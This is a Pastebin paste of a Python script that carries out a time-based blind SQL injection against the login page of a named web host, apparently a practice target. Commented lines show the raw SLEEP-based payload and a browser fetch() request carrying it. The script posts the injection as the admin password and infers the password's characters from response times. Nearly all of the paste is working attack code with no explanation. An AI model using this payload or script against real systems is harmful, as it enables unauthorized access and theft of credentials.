Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # test' OR IF(substring(password,1,1)='a' SLEEP(10), null)' --
- # fetch("http://reign-vuln-1.azurewebsites.net/check_login.php", {"credentials":"include","headers":{"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","accept-language":"en-US,en;q=0.9","cache-control":"max-age=0","content-type":"application/x-www-form-urlencoded","upgrade-insecure-requests":"1"},"referrer":"http://reign-vuln-1.azurewebsites.net/","referrerPolicy":"no-referrer-when-downgrade","body":"myusername=admin&mypassword=test%27+OR++IF%28substring%28password%2C1%2C1%29%3D%27c%27+SLEEP%2810%29%2C+null%29%27+--&submit_button=Submit","method":"POST","mode":"cors"});
- from stringprep import c22_specials
- import requests
- from rich import print
- url = "http://reign-vuln-1.azurewebsites.net/check_login.php"
- CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"
- l_guess = []
- i = 1
- highest_time = 0
- highest_char = "a"
- key = ""
- password=""
- for c in CHARSET:
- key_guesses = {}
- test_password = password + c
- #Construct the SQL timing exploit
- exploit = "{}' OR IF(substring(password,1,{}) = '{}', SLEEP(3), null) --'".format(password, str(i), test_password)
- #Construct the input payload, where the username is admin
- #and the password is the exploit
- payload = {
- "myusername": "admin",
- "mypassword": exploit,
- "submit_button": "Submit"
- }
- #Visit the website url using the requests library
- with requests.Session() as s:
- p = s.post(url, data=payload)
- ti = p.elapsed.total_seconds()
- if ti > highest_time:
- highest_char = c
- highest_time = ti
- key_guesses[c] = ti
- print (f"{highest_char} : {highest_time}")
- key += highest_char
- l_guess.append(key_guesses)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement